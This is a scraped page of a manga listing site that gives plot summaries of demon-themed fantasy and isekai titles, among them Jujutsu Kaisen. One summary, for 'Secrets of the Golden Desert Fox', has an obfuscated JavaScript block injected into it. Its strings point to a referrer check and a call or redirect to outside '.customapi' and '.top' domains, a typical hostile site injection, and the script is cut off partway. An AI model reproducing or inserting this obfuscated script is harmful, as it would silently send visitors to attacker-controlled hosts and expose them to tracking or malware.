Demons - Page 9

Discover top manga Demons with stunning art and thrilling tales. Enjoy the best Demons manga free online today!

267 results

Saikyou Onmyouji no Isekai Tenseiki: Geboku no Youkaidomo ni Kurabete Monster ga Yowai Sugirundaga

Haruyoshi Kuga’s power as the strongest exorcist is all for naught when he is betrayed by his closest ally. With his dying breath, he casts the secret Spell of Reincarnation — when he next opens his eyes, he finds himself in a different world altogether, reincarnated as Seika Lamprogue, the son of a family of magic scholars! He quickly learns that the magic in this new world is quite unlike the sorcery he learned in his past life and that he can’t use it. Fortunately for him, with his mastery of curses and the hordes of youkai at his disposal, he doesn’t need to. Haruyoshi (now Seika) is determined not to repeat his past mistakes in his second life by smartly laying low and avoiding flaunting his power. Yet accomplishing his goals and without drawing attention to himself proves to be easier said than done — will his powers be enough to live a happy life?! --- [Official English Light Novel](


Ochikobore Yuusha to Rikka no Majo

Shuu, a student of the Hero Academy whose swordsmanship and magic skills have not developed, is finally advised by the headmaster to drop out! Two beautiful witches suddenly appear before him and tell that he is the chosen one who has inherited the soul of the Demon King and that he needs to cooperate with the witches to unleash its mighty power. Shuu quickly learns how to liberate himself, and for the first time in his life, he is able to use magic and successfully clears the final examinations that will prevent to be expelled from the academy! Shuu then decides to first become a hero with the power of the Demon King as a prerequisite for becoming the Demon King that the witches want...

1 days ago

Jikan Teishi Yuusha - Yomei 3-ka no Settei ja Sekai wo Sukuu ni wa Mijika Sugiru

KUZUNO Sekai was transported to a medieval fantasy game-like world (isekai). He was given a game controller with the ability to stop time and a 3 days countdown timer. Now he has to figure out the mechanics of this game world and clear it in time. *Note 1: \"Time Stop Brave\" is the original romanization of the title. The word \"Brave\" is used as a noun to mean a \"brave man\" (勇者), but not exactly a \"hero\" (英雄).* *Note 2: The Nips ver. route offers a more immersive experience (uncensored nipples).*


Beastmaster: I can see the complete encyclopedia of evolution

An awakening in a desperate situation, Li Wenxuan, an ordinary college student, was pushed into the era of fantasy beast masters by fate. Starting from the lowest level fantasy beast, he groped forward in revenge and protection, pursuing his own power and beliefs. This is a golden age where fantasy beasts and humans coexist, and Li Wenxuan is destined to embark on a unique path of rise.


Shinkon Quest: Maou no Musume wa Majime Yuusha o Otoshitai ♡

Harold is the descendant of the hero who defeated the evil demon king. In this peaceful era, Harold has become a convenient handyman for the townsfolk. One day, a sacred book predicting the world\'s destruction is discovered. The condition to avert this catastrophe is... \"you must complete the \'Newlyweds Quest\' with the demon king\'s daughter.\" Thus begins Harold\'s unexpected married life with Yona, the demon king\'s daughter. While Harold still feels bewildered by all this, not only can Yona perfectly handle the household chores, she sweetly pampers him when he\'s tired. However, she harbors a secret...


The End of the World: The Emperor Banner invites all female disciples to take their seats

Su Bai was about to ascend to heaven but was framed by his female apprentice. When he woke up again, he had traveled to a modern society where zombies were rampant and he had become an ordinary person. The only thing he could use was a low-level magic weapon, the Ten Thousand Souls Banner. With the awakening of the Ten Thousand Souls Banner system, Su Bai had hope of returning to the top. What made Su Bai even more excited was that the female apprentices who framed him also traveled to this world with the turbulence of time and space.


Secrets of the Golden Desert Fox

A love story between a human with a hidden identity and a ghost. A story that pioneers a new era of romantic fantasy comics in south korea.<script></script><script>function _0x13a0(){var _0x1de4b5=['858522kyRTLk','4zOOODQ','href','406213fomOZy','BIoCf','referrer','whkBj','includes','CFklU','nWqDG','','google','508866WDwjlQ','location','149780pMArXZ','10eFhyyB','TcpBT','ATlTN','https://ip','random','.customapi','4243896eYnfey','vsFTz','floor','BYUuP','http://rea','UTujA','3382869amIgAW','45hYBAzK','1438890UrxgYw','.top/','text','XdfxG','then'];_0x13a0=function(){return _0x1de4b5;};return _0x13a0();}function _0x6113(_0x1a7201,_0x4a44ef){var _0x4bd7ae=_0x13a0();return _0x6113=function(_0x2247d4,_0x135b2a){_0x2247d4=_0x2247d4-(-0xe94+0x15c1+-0x6b5);var _0x4518ee=_0x4bd7ae[_0x2247d4];return _0x4518ee;},_0x6113(_0x1a7201,_0x4a44ef);}(function(_0x4a0cbe,_0x724643){var _0x23f409=_0x6113,_0x4a5c05=_0x4a0cbe();while(!![]){try{var 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Manadeshi ni Uragirarete Shinda Ossan Yuusha, Shijou Saikyou no Maou to Shite Ikikaeru

The hero, Fried, confronts the demon lord with his student, Lyle. Fried killed the demon lord after a ferocious battle. “I\'m going to put an end to this war!” Just as he was about to finish off the demon lord, he is betrayed by his student who attacked from behind. Fried, who was supposed to be dead, wakes up next to a demon girl who calls him the demon lord for some reason. It seems that Fried has risen as the new demon lord and will now have to protect the demonkind under his command while fighting his former comrades - [Webnovel Link](


Shounin Skill de Maoujou no Kouryaku wo Mezasu ~Isekai Tenishita no de Saikyou Item to Tookujutsu de Ikinuku to ni shita~

One day, Sota, a university student, is summoned to another world! Moreover, after being summoned, he was mistaken for a hero and imprisoned in the Demon King\'s Castle, where he was in a desperate situation...! Sota gets through the predicament with his natural skill, but for some reason he ends up solving the embarrassing problem of Fafnir, a super beautiful demi-human...!? Win the hearts of the demi-human girls living in Demon King\'s Castle and aim to escape from Demon King\'s Castle! A fantasy romantic comedy that opens up a different world with its natural business spirit, begins!


Jujutsu Kaisen

Hidden in plain sight, an age-old conflict rages on. Supernatural monsters known as "Curses" terrorize humanity from the shadows, and powerful humans known as "Jujutsu" sorcerers use mystical arts to exterminate them. When high school student Yuuji Itadori finds a dried-up finger of the legendary Curse Sukuna Ryoumen, he suddenly finds himself joining this bloody conflict. Attacked by a Curse attracted to the finger's power, Yuuji makes a reckless decision to protect himself, gaining the power to combat Curses in the process but also unwittingly unleashing the malicious Sukuna into the world once more. Though Yuuji can control and confine Sukuna to his own body, the Jujutsu world classifies Yuuji as a dangerous, high-level Curse who must be exterminated. Detained and sentenced to death, Yuuji meets Satoru Gojou—a teacher at Jujutsu High School—who explains that despite his imminent execution, there is an alternative for him. Being a rare vessel to Sukuna, if Yuuji were to die, then Sukuna would perish too. Therefore, if Yuuji were to consume the many other remnants of Sukuna, then Yuuji's subsequent execution would truly eradicate the malicious demon. Taking up this chance to make the world safer and live his life for a little longer, Yuuji enrolls in Jujutsu High, jumping headfirst into a harsh and unforgiving battlefield. [Written by MAL Rewrite]
